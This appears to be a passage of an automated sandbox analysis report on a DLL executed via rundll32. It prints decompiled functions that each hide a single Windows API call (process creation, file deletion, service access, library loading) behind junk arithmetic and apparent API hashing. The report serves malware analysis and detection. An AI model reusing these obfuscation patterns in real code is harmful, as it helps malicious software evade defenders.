Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6976 Parent PID: 6788 rundll32.exeCOMMON

Executed Functions

Function 04E052B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E04E052B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E1FE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E04E0EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x04e052c0
0x04e052c3
0x04e052c5
0x04e052c8
0x04e052cc
0x04e052cd
0x04e052d2
0x04e052d9
0x04e052e2
0x04e052e9
0x04e052f0
0x04e052f7
0x04e052fe
0x04e0530a
0x04e0530f
0x04e05314
0x04e0531b
0x04e0531f
0x04e05326
0x04e0532d
0x04e05337
0x04e0533f
0x04e05342
0x04e05349
0x04e05360
0x04e05363
0x04e05376
0x04e0537f
0x04e05385

APIs

LoadLibraryW.KERNEL32 ref: 04E0537F

Strings

,*FV, xrefs: 04E052F7
.9h, xrefs: 04E052D9
1, xrefs: 04E05326

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: 6031d70bb48de35eff787a3215da77a0a912123fc485c468a42c85f030832142
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: EC2156B6D00208FBEF08DFA8D94A9EEBBB5FB40314F108198E815A6250D3B46B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E21538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04E21538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E04E1FE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E04E0EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x04e2153e
0x04e21543
0x04e21548
0x04e2154f
0x04e21558
0x04e2155f
0x04e2156b
0x04e21570
0x04e21575
0x04e2157c
0x04e21583
0x04e2158a
0x04e21591
0x04e21595
0x04e2159c
0x04e215a3
0x04e215ad
0x04e215b2
0x04e215ba
0x04e215bf
0x04e215c4
0x04e215cb
0x04e215d6
0x04e215e6
0x04e215e9
0x04e215f3
0x04e215f6
0x04e2160a
0x04e21615
0x04e2161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 04E21615

Strings

d , xrefs: 04E2158A
Zs, xrefs: 04E2154F

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: a6679982471be3cab86429a4e3db5b1ca15a76a5b87fa9c84dcaaf304c0775e5
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 0B213CB5E40209FFEB04DFA5D9499DEBBB1EB40314F10C099E618BB290D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 04E0D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E04E0D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E1FE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E04E0EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x04e0d068
0x04e0d06b
0x04e0d06d
0x04e0d070
0x04e0d074
0x04e0d075
0x04e0d07a
0x04e0d081
0x04e0d087
0x04e0d08e
0x04e0d095
0x04e0d09c
0x04e0d0a3
0x04e0d0a7
0x04e0d0ae
0x04e0d0b5
0x04e0d0bc
0x04e0d0c0
0x04e0d0c7
0x04e0d0ce
0x04e0d0d5
0x04e0d0dc
0x04e0d0e3
0x04e0d0ef
0x04e0d0f7
0x04e0d0fa
0x04e0d101
0x04e0d108
0x04e0d10f
0x04e0d116
0x04e0d11d
0x04e0d13c
0x04e0d145
0x04e0d14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04E0D145

Strings

7XJ, xrefs: 04E0D0D5
3l}!, xrefs: 04E0D0AE

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: 18048182de83fab42f9571e03e17c459e55af622ea6ed89389a912fb7013d56e
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: C82145B5D00318AFDF18DFA4C98A9DEFBB0FF14304F108188E966A6220D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 04E22C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E04E22C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04E1FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E04E0EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04e22c2c
0x04e22c31
0x04e22c33
0x04e22c36
0x04e22c37
0x04e22c3a
0x04e22c3d
0x04e22c3e
0x04e22c41
0x04e22c44
0x04e22c47
0x04e22c4a
0x04e22c4b
0x04e22c4e
0x04e22c4f
0x04e22c51
0x04e22c52
0x04e22c57
0x04e22c61
0x04e22c64
0x04e22c67
0x04e22c6e
0x04e22c72
0x04e22c76
0x04e22c7d
0x04e22c84
0x04e22c8b
0x04e22c92
0x04e22c99
0x04e22ca0
0x04e22ca4
0x04e22cab
0x04e22cb2
0x04e22cb9
0x04e22cc0
0x04e22cc7
0x04e22ce8
0x04e22d02
0x04e22d09

APIs

CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04E22D02

Strings

3HS, xrefs: 04E22C57

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: e74c47a5ce9ebf3f13e9cb418dedce309b617b0aa937c68d5b20cbd9d3e68997
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 5421F572800248BBCF159F96DC0ACDFBFB9EF85744F108158F91562220C3759A64DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E245CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E04E245CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04E1FE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E04E0EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x04e245d2
0x04e245d7
0x04e245d9
0x04e245dc
0x04e245df
0x04e245e2
0x04e245e5
0x04e245e8
0x04e245eb
0x04e245ee
0x04e245f1
0x04e245f4
0x04e245f5
0x04e245f7
0x04e245f8
0x04e245fd
0x04e24607
0x04e2460a
0x04e24611
0x04e24618
0x04e2461f
0x04e24626
0x04e2462d
0x04e24634
0x04e2463b
0x04e24642
0x04e2465d
0x04e24660
0x04e24667
0x04e2466e
0x04e24675
0x04e2467c
0x04e24688
0x04e2468b
0x04e2469e
0x04e246b5
0x04e246bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 04E246B5

Strings

OM , xrefs: 04E245FD

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: 0e58f2ab469a503ecdeba58ee16101161ac22bcd535e17fd7fcee5e60fb280d6
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: F421EC72801249BBCF05DFA9CD46CDEBFB5EF88304F508199F915A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E244FF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04E244FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;

				E04E1FE29(_t47);
				_v20 = 0xa68a31;
				_t60 = 0x6d;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x00000260;
				_v16 = 0xfa9629;
				_v16 = _v16 + 0x734b;
				_v16 = _v16 ^ 0x638d356d;
				_v16 = _v16 ^ 0x637ea9c8;
				_v8 = 0x3f26ab;
				_v8 = _v8 ^ 0xcdd207a4;
				_v8 = _v8 ^ 0xb6eb62c4;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0005a548;
				_v12 = 0xe291fe;
				_t61 = 0x24;
				_v12 = _v12 / _t61;
				_v12 = _v12 + 0x3d74;
				_v12 = _v12 ^ 0x00095158;
				_t57 = E04E0EB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
				return _t58;
			}

0x04e24517
0x04e2451c
0x04e2452d
0x04e24532
0x04e24537
0x04e2453e
0x04e24545
0x04e2454c
0x04e24553
0x04e2455a
0x04e24561
0x04e24568
0x04e2456f
0x04e24573
0x04e2457a
0x04e24584
0x04e2458c
0x04e2458f
0x04e24596
0x04e245b2
0x04e245c4
0x04e245c9

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 04E245C4

Strings

XQ, xrefs: 04E24596

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: XQ
API String ID: 3935143524-1200779947
Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction ID: 41e94715a7e80d98dca0ff38fc3c91415c9d2d172db3fdda1f6521a7f29eecce
Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction Fuzzy Hash: 36214A71E4020CFBEF14CFE5DC4AB9EBBB1EF54704F108189B920A6290D3B59A649F40

Uniqueness

Uniqueness Score: -1.00%

Function 04E0EE62, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E04E0EE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				void* _t41;
				void* _t44;

				_push(_a20);
				_t44 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04E1FE29(_t34);
				_v20 = 0xea751a;
				_v20 = _v20 | 0xe9b69993;
				_v20 = _v20 ^ 0xe9f29d6b;
				_v16 = 0x605393;
				_v16 = _v16 | 0xcc974431;
				_v16 = _v16 ^ 0xccf8b40a;
				_v12 = 0x102a1a;
				_v12 = _v12 + 0xcb09;
				_v12 = _v12 ^ 0x001131dd;
				_v8 = 0x570378;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xef617e60;
				_v8 = _v8 ^ 0xef696bf9;
				E04E0EB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
				return _t41;
			}

0x04e0ee69
0x04e0ee6c
0x04e0ee6e
0x04e0ee71
0x04e0ee74
0x04e0ee77
0x04e0ee7a
0x04e0ee7b
0x04e0ee7c
0x04e0ee81
0x04e0ee8b
0x04e0ee92
0x04e0ee99
0x04e0eea0
0x04e0eea7
0x04e0eeae
0x04e0eeb5
0x04e0eebc
0x04e0eec3
0x04e0eeca
0x04e0eece
0x04e0eed5
0x04e0eef6
0x04e0ef05
0x04e0ef0b

APIs

OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E0EF05

Strings

`~a, xrefs: 04E0EECE

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: `~a
API String ID: 3098006287-142445290
Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction ID: 1deeca2c7b105496c7b5a2fb317bd8f2bd838efb8fb317ae69e3fed4e7bd480b
Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction Fuzzy Hash: 9111F575C01218FBDF48DFA5DD0A8DEBFB5EB04314F108588F92562261D3759A20AF91

Uniqueness

Uniqueness Score: -1.00%

Function 04E1648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E04E1648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04E1FE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E04E0EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x04e16491
0x04e16494
0x04e16496
0x04e16499
0x04e1649c
0x04e164a0
0x04e164a1
0x04e164a6
0x04e164b0
0x04e164b4
0x04e164bb
0x04e164bf
0x04e164c6
0x04e164cd
0x04e164d1
0x04e164d8
0x04e164df
0x04e164fa
0x04e164fd
0x04e16504
0x04e1650b
0x04e16512
0x04e16519
0x04e16520
0x04e16534
0x04e16543
0x04e16549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04E16543

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: ab670b96627405c424938ccee66996601f023a9580e24fe66bf4449bbe1b367c
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: 4311D0B2C0121DFBDF06DFA5D9498DEBBB4FB04314F108598E921A6260E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 04E1E8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04E1E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E04E1FE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E04E0EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x04e1e8bd
0x04e1e8c2
0x04e1e8c5
0x04e1e8c6
0x04e1e8ca
0x04e1e8cb
0x04e1e8d0
0x04e1e8da
0x04e1e8e1
0x04e1e8e8
0x04e1e8ef
0x04e1e8f3
0x04e1e8fa
0x04e1e901
0x04e1e908
0x04e1e90f
0x04e1e92a
0x04e1e92d
0x04e1e941
0x04e1e94e
0x04e1e954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 04E1E94E

Memory Dump Source

Source File: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Offset: 04E00000, based on PE: true

Associated: 00000008.00000002.336185439.0000000004E00000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.336221870.0000000004E26000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e00000_rundll32.jbxd

Yara matches

Similarity

